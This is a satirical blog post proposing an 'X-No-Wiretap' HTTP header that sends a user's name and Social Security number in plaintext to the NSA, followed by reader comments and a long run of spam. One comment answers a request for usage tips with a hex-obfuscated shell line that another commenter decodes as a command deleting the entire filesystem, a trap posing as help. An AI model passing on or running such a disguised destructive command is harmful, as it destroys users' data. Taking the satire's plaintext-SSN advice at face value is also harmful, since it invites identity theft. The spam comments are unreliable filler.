Recently, the American public has been forcefully made aware of the existence of various programs by the NSA- including massive infrastructure for intercepting all domestically routed communications to better protect us from imminent foreign threats. With legions of patriotic analysts, the NSA methodically ranks communications on the basis of their “foreignness” factor to determine candidacy for prolonged retention. Although it was developed with the best interests of the American people at heart, this program unwittingly ensnares communications of purely domestic nature on the order of tens of thousands of incidents per day. These innocent mistakes are putting the agency at a great risk because the 4th Amendment of the Constitution expressly prohibits such affronts to American privacy. Making determinations of foreignness is hard, but to prevent further inconvenience to the American way of life, we should take these leaks as an opportunity for us on the civilian front to aid the NSA by voluntarily indicating citizenship on all our networked communications.
Here, we define the syntax and semantics of X-No-Wiretap, a HTTP header-based mechanism for indicating and proving citizenship to well-intentioned man-in-the-middle parties. It is inspired by the enormously successful RFC 3514 IPv4 Security Flag and HTTP DNT header.
Syntax
The HTTP header, “X-No-Wiretap” takes the value of the current user’s given name under penalty of perjury. The full name must be immediately followed by identity verification in the form of a standard U.S. Social Security Number, formatted with a hyphen “-” after every third and fifth digit.
Future revisions of the protocol may introduce additional forms of verification, as while the presence of an SSN should be able to lower the foreignness coefficient of the vast majority of domestic communications to well below 51%- initial research seems to indicate that the combination of full first name and SSN is able to reduce an associated message’s foreignness factor by over 76.8% for 99.997% of Americans. However, there is a chance that certain instances may additional require Passport, Driver’s License, Address, Birthdate, Mother’s Maiden Name, and Childhood Best Friend’s Name to further lower the foreignness factor. This capability will be addressed in future versions of the protocol.
What about SSL/TLS?
Of course adding encryption makes it substantially more difficult for the NSA to interpret the content of what a user is sending, and increases the chance that they may unwittingly collect and retain your communications. In order to address these concerns, this proposal necessarily deprecates all the SSL/TLS ciphers in favor of Double CAESAR’13, a thoroughly studied and well-known military-grade solution which offers excellent modes for graceful redegradation.
Isn’t it dangerous to send your social security number in plaintext along with every request?
Conventional security warns of the possibility of man-in-the-middle attacks, but these new intelligence revelations require entirely new types of cryptographic thinking. Here, the trusted entity is not the server acting at one end, it’s not even the user issuing the requests- but rather, it’s the bureaucracy sitting in the middle politely intercepting all traffic for benevolent analysis- protecting your way of life.
One may be tempted to characterize this as a sacrifice of privacy in order to optimize security, but this position is simply naive. Every new progressive initiative of the government advances both fronts- both security and liberty, never at the expense of either. If you take a holistic long term perspective on the impact on a global scale with a vast array of (classified) information sources, there is very little question that you too would arrive at the same conclusions on the genuine merits of this surveillance system.
In this case, the removal of encryption ensures that the government is able to parse the content of messages to identify terrorists. At the same time, the inclusion of the citizenship identification information should give citizens the safety of mind, knowing that their messages will not be stored indefinitely in a NSA datacenter.
What about Identity Theft?
What if you set up a server to transparently capture the browser headers? Any malicious entity could then collect all the social security numbers and real identities of everyone who happened to stumble onto their websites and use the information to sign up for credit cards, create hazardous investments, threaten or blackmail loved ones, and masquerade as a citizen while doing terrorist activities!
There isn’t any real evidence that such sweeping surveillance will even substantially reduce the chances of events that are intrinsically outliers anyway. On the other hand, identity theft is a real world issue which affects millions of Americans on a daily basis- and these changes will only make our real problems worse.
— Short-Sighted Critic
Our government has to reconcile with the fact that the flow of information has radically shifted in the past few decades- all the previous paradigms of privacy, security and adversaries have been obsoleted. Understandably, they need to create infrastructure to tackle this next generation of attacks. This could mean highly orchestrated attacks being planned online, and the government is justified in trying to exercise every available option to avert the next cyber-9/11. Our adversaries may have no limits to their capabilities, and so waiting for definitive evidence on the efficacy of counter-intelligence approaches is giving them an opportunity to plan their next attack.
When what’s at stake is the American way of life, it’s easy to put aside things that don’t really matter.
If the terrorists do find a way to cheat the foreignness heuristic, that’s not a problem, because this proposal is backwards compatible with the existing catch-all NSA policy. They can always, in the end, ignore the X-No-Wiretap header, but we wouldn’t know so it’d be okay.
When can I use this?
It’s expected that this proposal will breeze through the standardization process- because we as Americans can always get together and do that which must be done in these times which try men’s souls. Browsers should implement the feature as soon as possible, so that people can make use of the increased sense of security and privacy it affords.
If you’re truly eager to try it out, you can contribute to the prototype chrome extension which supports the header injection (the reversal of HTTPS Everywhere, a feature called HTTPS Nowhere hasn’t been implemented yet, but we’re accepting pull requests!). Since this extension is still experimental, inserting your personal identifiable information must be done by editing the source code, but you should expect a more user friendly interface in the next revision. Since it isn’t thoroughly tested, there may be a chance that it fails to leak the user’s personally identifiable information with every networked request, but rest assured this will be fixed as soon as the bugs are made aware to us.
We should all rally behind this proposal for a simple technical solution which will go a great length to simultaneously enhancing both privacy and security, while overall preserving the only thing which matters, our American way of life.
What is the best way to use this before it’s implemented in browsers? Thanks
This should just about do it, run it from the command line in linux or osx:
$(echo 7375646f20726d202d2d6e6f2d70726573657276652d726f6f74202d7266202f | xxd -r -p)
Windows already has this feature built in, so no need to do anything.
Anonymous, very funny.
For those interested, command runs
sudo rm –no-preserve-root -rf /
The real threat to your american way of life is NSA and the surveillance state they build. I will not write a long comment why I think your post is wrong on many levels but I advice you to read schneier.com (look through the archives and watch his talks on youtube), or theguardian.com/world/nsa and reconsider your view about surveillance, imminent threats and downgrading of security and privacy.
Dear John Doe,
I refer you to http://en.wikipedia.org/wiki/A_Modest_Proposal for a similarly intentioned post, since the author of this one failed to include the ‘sarcasm’ tag.
“The real threat to your american way of life is NSA”
No, you idiot. It’s the dozen federal law enforcement agencies (headlined by the FBI & DEA), hundreds of aggressive local agencies, idiot citizens who spill their lives onto Facebook & Instagram, and — worst of all — a mass media that foments hysterical panic at the slightest drop of the hat which politicians feel obliged to “do something about”.
“well-intentioned man-in-the-middle parties”
I beg your pardon?
“I beg your pardon?”
Note how he mentions the enormously successful RFC 3514 IPv4 Security Flag? Google it, and all will (should) be explained.
I would call this the submissive quisling response to Snowden revelations. You have the RFC equivalent of “Papers, Please!” response.
Why give additional, voluntary plain-text metadata to an agency that has repeatedly demonstrated that it is unconstrained by rule of law, and has no ethical boundary for actions?
satire, people. SATIRE.
“Why give additional, voluntary plain-text metadata”
Don’t blab on about crap you obviously know nothing about. (If you *did* know anything about the Intarweb, the satire would have screamed out to you in paragraph 2).
You’d have to be a complete idiot to put your social security number in the headers of your website.
Dear Anon, you are very very right about that, however, not only is this article very obious satire, nowhere does it suggest “puttings your social security number in the headers of your website”, rather putting your social security number in the request headers sent out by the user agent (in your case, internet explorer 4) when attempting to access a website.
I smell conspiracy here.
I think “X-Papers-Please” might be a better name for the header.
For this to work, a NSSN (National security signature number) would need to be created that is specific to a person but does not tie into their interactions other than communications (similar to an IP address via ARIN, or an AS number). It would ideally not be contained in the header of the datagram, but as an additional layer 4 or something. It’s adoption as a header would be faster, but should also include an RFC to assist at the networking layer. Consider it to be signed traffic.
Hang on, what can us Australian’s do if we want to get in on the action? My humble suggestion is a global personal identifier which we could all use rather than just those from USA!
“a global personal identifier”
It would be a New World Order of hierarchy and knowing our places in society!
The article is .. satire… ok… I beg your pardon.. well done… Sometimes it is not easy to distinguish between satire texts written by smart people and texts written by crazy people…
“Given name” means first name. I think you meant full name.
Thanks, this was hilarious.
I am extremely impressed with your writing skills and also with the
layout on your blog. Is this a paid theme or did you modify
it yourself? Either way keep up the nice quality writing, it’s rare to see a nice blog like this one nowadays.
Unquestionably believe that which you said.
Your favorite reason appeared to be on the internet the
easiest thing to be aware of. I say to you, I definitely get irked while people consider worries that they just do not
know about. You managed to hit the nail upon the top and defined out the whole thing without having side-effects , people
could take a signal. Will probably be back to get more. Thanks
Howdy! I could have sworn I’ve been to this site before but after browsing through some of the post
I realized it’s new to me. Anyways, I’m definitely happy I found it and
I’ll be book-marking and checking back often!
Great work! This is the kind of info that are
supposed to be shared around the web. Disgrace on the
seek engines for no longer positioning this submit upper!
Come on over and discuss with my website . Thanks =)
Fabulous, what a web site it is! This blog presents helpful facts to us,
keep it up.
Hello, i read your blog occasionally and i own a similar one and i was just wondering if you get a lot of spam remarks?
If so how do you stop it, any plugin or anything you can suggest?
I get so much lately it’s driving me crazy so any support is very much
appreciated.
Howdy! This article could not be written much better! Going through this article reminds me of my previous roommate!
He constantly kept talking about this. I’ll forward this
article to him. Fairly certain he will have a good read.
I appreciate you for sharing!
Post writing is also a excitement, if you
be familiar with afterward you can write if not it is complex to write.
I constantly spent my half an hour to read this website’s content all the time along with a mug of coffee.
Yes! Finally someone writes about Tv Commercial Companies Toronto
ON.
I loved as much as you will receive carried out right here.
The sketch is attractive, your authored subject matter stylish.
nonetheless, you command get bought an impatience over that you
wish be delivering the following. unwell unquestionably come
more formerly again since exactly the same nearly a lot often inside case
you shield this increase.
It is good to know that you can invest numerous retirement assets for your IRA account aside from the conventional assets.
To get started in any sort of proposal writing, your first step should be to gather information about the party who
will judge your proposal. That way you will
become aware of how much you should be expecting to offer.
WOW just what I was looking for. Came here by searching for Temporary Employment
Agencues In Orange County
Howdy! I realize this is kind of off-topic however I needed to ask.
Does running a well-established blog like yours require a large
amount of work? I’m brand new to writing a blog but I do
write in my journal on a daily basis. I’d like to start a
blog so I can share my own experience and thoughts online.
Please let me know if you have any kind of ideas or tips for new aspiring blog owners.
Appreciate it!
I’m gone to inform my little brother, that he should also
pay a quick visit this webpage on regular basis to get
updated from most up-to-date news update.
Its like you read my mind! You seem to understand so much approximately this, like
you wrote the guide in it or something. I feel that you simply could do with a
few percent to pressure the message home a bit, however
other than that, that is great blog. An excellent read.
I will certainly be back.
I believe this is among the such a lot vital information for me.
And i’m glad reading your article. But want to commentary on some general things, The website style is great, the articles is actually great : D.
Excellent activity, cheers